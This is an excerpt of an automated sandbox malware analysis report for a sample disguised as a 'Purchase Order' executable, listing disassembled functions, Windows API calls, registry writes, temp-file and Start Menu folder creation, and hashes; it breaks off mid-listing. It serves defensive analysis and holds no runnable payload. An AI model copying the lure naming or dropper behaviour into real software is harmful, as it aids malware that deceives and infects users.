                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ErrorLast$CreateDirectoryFileSecurity
                                            • String ID: C:\Users\user\Desktop
                                            • API String ID: 3449924974-3976562730
                                            • Opcode ID: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                            • Instruction ID: 56aaffc7fd545305371b439287a03fd7ccaf004a29b63406c0e33255b185a1b6
                                            • Opcode Fuzzy Hash: c7775b55854fc79259119bfc4daa9494171cd7cf58f96f816c013ac7f64a11dc
                                            • Instruction Fuzzy Hash: 90011A72D00619EADF00DFA1C944BEFBBB8EF14354F00843AE945B6281D7789618CFA9
                                            Function 00405DDF Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 37COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 821 405ddf-405deb 822 405dec-405e20 GetTickCount GetTempFileNameW 821->822 823 405e22-405e24 822->823 824 405e2f-405e31 822->824 823->822 825 405e26 823->825 826 405e29-405e2c 824->826 825->826
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00405DFD
                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe",0040338D,1033,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,771B3420,004035D9), ref: 00405E18
                                            Strings
                                            • "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe", xrefs: 00405DDF
                                            • nsa, xrefs: 00405DEC
                                            • C:\Users\user~1\AppData\Local\Temp\, xrefs: 00405DE4, 00405DE8
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CountFileNameTempTick
                                            • String ID: "C:\Users\user\Desktop\Purchase Order Purchase Order Purchase Order Purchase Order.exe"$C:\Users\user~1\AppData\Local\Temp\$nsa
                                            • API String ID: 1716503409-1382589664
                                            • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                            • Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
                                            • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                            • Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64
                                            Function 73CF177B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 827 73cf177b-73cf17ba call 73cf1b63 831 73cf18da-73cf18dc 827->831 832 73cf17c0-73cf17c4 827->832 833 73cf17cd-73cf17da call 73cf2398 832->833 834 73cf17c6-73cf17cc call 73cf2356 832->834 839 73cf17dc-73cf17e1 833->839 840 73cf180a-73cf1811 833->840 834->833 843 73cf17fc-73cf17ff 839->843 844 73cf17e3-73cf17e4 839->844 841 73cf1813-73cf182f call 73cf256d call 73cf15b4 call 73cf1272 GlobalFree 840->841 842 73cf1831-73cf1835 840->842 868 73cf1889-73cf188d 841->868 845 73cf1837-73cf1880 call 73cf15c6 call 73cf256d 842->845 846 73cf1882-73cf1888 call 73cf256d 842->846 843->840 847 73cf1801-73cf1802 call 73cf2d2f 843->847 849 73cf17ec-73cf17ed call 73cf2a74 844->849 850 73cf17e6-73cf17e7 844->850 845->868 846->868 861 73cf1807 847->861 858 73cf17f2 849->858 856 73cf17e9-73cf17ea 850->856 857 73cf17f4-73cf17fa call 73cf2728 850->857 856->840 856->849 867 73cf1809 857->867 858->861 861->867 867->840 871 73cf188f-73cf189d call 73cf2530 868->871 872 73cf18ca-73cf18d1 868->872 877 73cf189f-73cf18a2 871->877 878 73cf18b5-73cf18bc 871->878 872->831 874 73cf18d3-73cf18d4 GlobalFree 872->874 874->831 877->878 879 73cf18a4-73cf18ac 877->879 878->872 880 73cf18be-73cf18c9 call 73cf153d 878->880 879->878 881 73cf18ae-73cf18af FreeLibrary 879->881 880->872 881->878
                                            APIs
                                              • Part of subcall function 73CF1B63: GlobalFree.KERNEL32(?), ref: 73CF1DB6
                                              • Part of subcall function 73CF1B63: GlobalFree.KERNEL32(?), ref: 73CF1DBB
                                              • Part of subcall function 73CF1B63: GlobalFree.KERNEL32(?), ref: 73CF1DC0
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF1829
                                            • FreeLibrary.KERNEL32(?), ref: 73CF18AF
                                            • GlobalFree.KERNEL32(00000000), ref: 73CF18D4
                                              • Part of subcall function 73CF2356: GlobalAlloc.KERNEL32(?,?), ref: 73CF2387
                                              • Part of subcall function 73CF2728: GlobalAlloc.KERNEL32(?,00000000,?,?,00000000,?,?,?,73CF17FA,00000000), ref: 73CF27F8
                                              • Part of subcall function 73CF15C6: lstrcpyW.KERNEL32(?,73CF4020,00001018,73CF1854,00000000,?), ref: 73CF15DC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            • Associated: 00000005.00000002.1958280098.0000000073CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958325836.0000000073CF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958346292.0000000073CF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Global$Free$Alloc$Librarylstrcpy
                                            • String ID:
                                            • API String ID: 1791698881-3916222277
                                            • Opcode ID: 260a6ae5563a65ed5e1a070abb8f00e73e428616fc5cbd5a248f736fe302d4dd
                                            • Instruction ID: 9976a7a3b82a30c46ea4c13b26b6db74ecc93b017f53430429a820171f137e0d
                                            • Opcode Fuzzy Hash: 260a6ae5563a65ed5e1a070abb8f00e73e428616fc5cbd5a248f736fe302d4dd
                                            • Instruction Fuzzy Hash: FA41BF7740034BABDB81EF609A84B963BBCBB00311F1A4565E94BDE1C6DB788584CB60
                                            Function 004023E4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 884 4023e4-402415 call 402c41 * 2 call 402cd1 891 402ac5-402ad4 884->891 892 40241b-402425 884->892 893 402427-402434 call 402c41 lstrlenW 892->893 894 402438-40243b 892->894 893->894 897 40243d-40244e call 402c1f 894->897 898 40244f-402452 894->898 897->898 902 402463-402477 RegSetValueExW 898->902 903 402454-40245e call 403116 898->903 906 402479 902->906 907 40247c-40255d RegCloseKey 902->907 903->902 906->907 907->891 909 40288b-402892 907->909 909->891
                                            APIs
                                            • lstrlenW.KERNEL32(C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp,00000023,00000011,00000002), ref: 0040242F
                                            • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp,00000000,00000011,00000002), ref: 0040246F
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp,00000000,00000011,00000002), ref: 00402557
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CloseValuelstrlen
                                            • String ID: C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp
                                            • API String ID: 2655323295-3807621495
                                            • Opcode ID: 32eb7900854dfab7e3c9f7d78c683c3ab3eda61f18b3c6a5b945fcd0328d3889
                                            • Instruction ID: 076fdad28fc4eb621c0ae83062707e46e05f76c541c0890e85279b1380dde0ba
                                            • Opcode Fuzzy Hash: 32eb7900854dfab7e3c9f7d78c683c3ab3eda61f18b3c6a5b945fcd0328d3889
                                            • Instruction Fuzzy Hash: F1118471D00108BEEB10AFA5DE89EAEBA74EB44754F15803BF504F71D1DBB48D409B28
                                            Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00405C3A: CharNextW.USER32(?,?,0042FA50,?,00405CAE,0042FA50,0042FA50,?,?,771B3420,004059EC,?,C:\Users\user~1\AppData\Local\Temp\,771B3420,00000000), ref: 00405C48
                                              • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                              • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                            • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 0040161A
                                              • Part of subcall function 004057F1: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                            • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes,?,00000000,?), ref: 0040164D
                                            Strings
                                            • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes, xrefs: 00401640
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                            • String ID: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\outtrumps\Tidenderne\Klapperes
                                            • API String ID: 1892508949-2950068324
                                            • Opcode ID: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
                                            • Instruction ID: 4927223e19ece6e176e0ab471dddb7e32c8def581d8881840bcbc1854d235eeb
                                            • Opcode Fuzzy Hash: 1db21258f9f14eeaa58e626a3877af1e49894c045ef04388b0de34e33f5ae299
                                            • Instruction Fuzzy Hash: 9711E231504505EBCF30AFA1CD0159F36A0EF14369B29493BFA45B22F1DB3E89519B5E
                                            Function 00405296 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • IsWindowVisible.USER32(?), ref: 004052C5
                                            • CallWindowProcW.USER32(?,?,?,?), ref: 00405316
                                              • Part of subcall function 0040427D: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040428F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: Window$CallMessageProcSendVisible
                                            • String ID:
                                            • API String ID: 3748168415-3916222277
                                            • Opcode ID: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                            • Instruction ID: 81d983181078a42bdaaa38d141d1896fcab4c42a172a92442cc7f35772e796f5
                                            • Opcode Fuzzy Hash: 724b08e39b448c58c7649a37dc1be8b90ebc0ba8e0923a3b5611d97535f2409a
                                            • Instruction Fuzzy Hash: 8E018431200709EBDF205F51DDD4A5B7B25EB84794F50507BFA00751D0D7BA8C929E2E
                                            Function 00406188 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(?,?,00000000,00000000,?,00000800,00000002,0042C228,00000000,?,?,Call,?,?,004063FC,80000002), ref: 004061CE
                                            • RegCloseKey.KERNELBASE(?,?,004063FC,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,0042C228), ref: 004061D9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID: Call
                                            • API String ID: 3356406503-1824292864
                                            • Opcode ID: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                            • Instruction ID: dbe656cbcd6f76d760dfbfd9a3b1c67a2d3549b4381969b9bec3f5648691b042
                                            • Opcode Fuzzy Hash: c86c14991d827863ed80974af0b6eb11eee99485bcf286d774b2a77da772c934
                                            • Instruction Fuzzy Hash: 22017C72500209EADF218F51CD09EDB3BA8EB55364F01803AFD16A61A1D778D964EBA4
                                            Function 004058A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00430250,Error launching installer), ref: 004058CC
                                            • CloseHandle.KERNEL32(?), ref: 004058D9
                                            Strings
                                            • Error launching installer, xrefs: 004058B6
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CloseCreateHandleProcess
                                            • String ID: Error launching installer
                                            • API String ID: 3712363035-66219284
                                            • Opcode ID: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                            • Instruction ID: eef1ad79794a30a774d0e472c728ed5028324d39c85b098150df6d3db2f5c38f
                                            • Opcode Fuzzy Hash: 26b27946013451d7cc559816144a6cf351020ce627575371dc693c6ec487af4b
                                            • Instruction Fuzzy Hash: 93E092B5600209BFEB00AB64ED49F7BBBACEB04704F508565BD51F2290D778EC148A78
                                            Function 00402032 Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 0040205D
                                              • Part of subcall function 00405322: lstrlenW.KERNEL32(0042C228,00000000,0041D800,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                              • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,0042C228,00000000,0041D800,771B23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                              • Part of subcall function 00405322: lstrcatW.KERNEL32(0042C228,0040327A,0040327A,0042C228,00000000,0041D800,771B23A0), ref: 0040537D
                                              • Part of subcall function 00405322: SetWindowTextW.USER32(0042C228,0042C228), ref: 0040538F
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                              • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                            • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 0040206E
                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 004020EB
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                            • String ID:
                                            • API String ID: 334405425-0
                                            • Opcode ID: feecde648e4e86c349c2181d42606f42c320c3d08ea0eac6231e50817e8518ef
                                            • Instruction ID: 732860e23109d101385e559ec06a1cde6071cd761d8e517fa4c79c7f2b675a05
                                            • Opcode Fuzzy Hash: feecde648e4e86c349c2181d42606f42c320c3d08ea0eac6231e50817e8518ef
                                            • Instruction Fuzzy Hash: 4421B031D00205EACF20AFA5CE48A9E7A70BF04358F64413BF511B51E0DBBD8981DA6E
                                            Function 73CF2A74 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1958308022.0000000073CF1000.00000020.00000001.01000000.00000005.sdmp, Offset: 73CF0000, based on PE: true
                                            • Associated: 00000005.00000002.1958280098.0000000073CF0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958325836.0000000073CF3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            • Associated: 00000005.00000002.1958346292.0000000073CF5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_73cf0000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastRead
                                            • String ID:
                                            • API String ID: 1948546556-0
                                            • Opcode ID: b16bf54d0b85ff4b0f0d14c4ce1f8df48bc1c99a3a694b3acab4707bbd5bd992
                                            • Instruction ID: e27064e768b36aa5725a623fe9dbe70d17043a353bd02f252e1ec18c7a75cacb
                                            • Opcode Fuzzy Hash: b16bf54d0b85ff4b0f0d14c4ce1f8df48bc1c99a3a694b3acab4707bbd5bd992
                                            • Instruction Fuzzy Hash: 5151607B50425FAFE7A1EFA5D880F593BB5EB44314F32452AD80ACF290DB399880CB51
                                            Function 00402484 Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,?,?,?,?), ref: 004024B5
                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user~1\AppData\Local\Temp\nsk59ED.tmp,00000000,00000011,00000002), ref: 00402557
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1910781463.0000000000463000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_5_2_400000_Purchase Order Purchase Order Purchase Order Purchase Order.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue
                                            • String ID:
                                            • API String ID: 3356406503-0
                                            • Opcode ID: 28dfcfb9a6f44a18c58c8206a7dfe2bd09e3a5ae6e90a5253dfd418af8ae02c6
                                            • Instruction ID: 794a7caf9ed311c3342b46d24488b6d71e3894ac8d4f1441d9e09f9d9ce2e922
                                            • Opcode Fuzzy Hash: 28dfcfb9a6f44a18c58c8206a7dfe2bd09e3a5ae6e90a5253dfd418af8ae02c6
                                            • Instruction Fuzzy Hash: A411A731D14205EBDF14DFA4CA585AE77B4EF44348F21843FE445B72C0D6B89A41EB59
                                            Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                            Memory Dump Source
                                            • Source File: 00000005.00000002.1909354463.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000005.00000002.1909172396.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909681017.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000456000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000005.00000002.1909846068.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
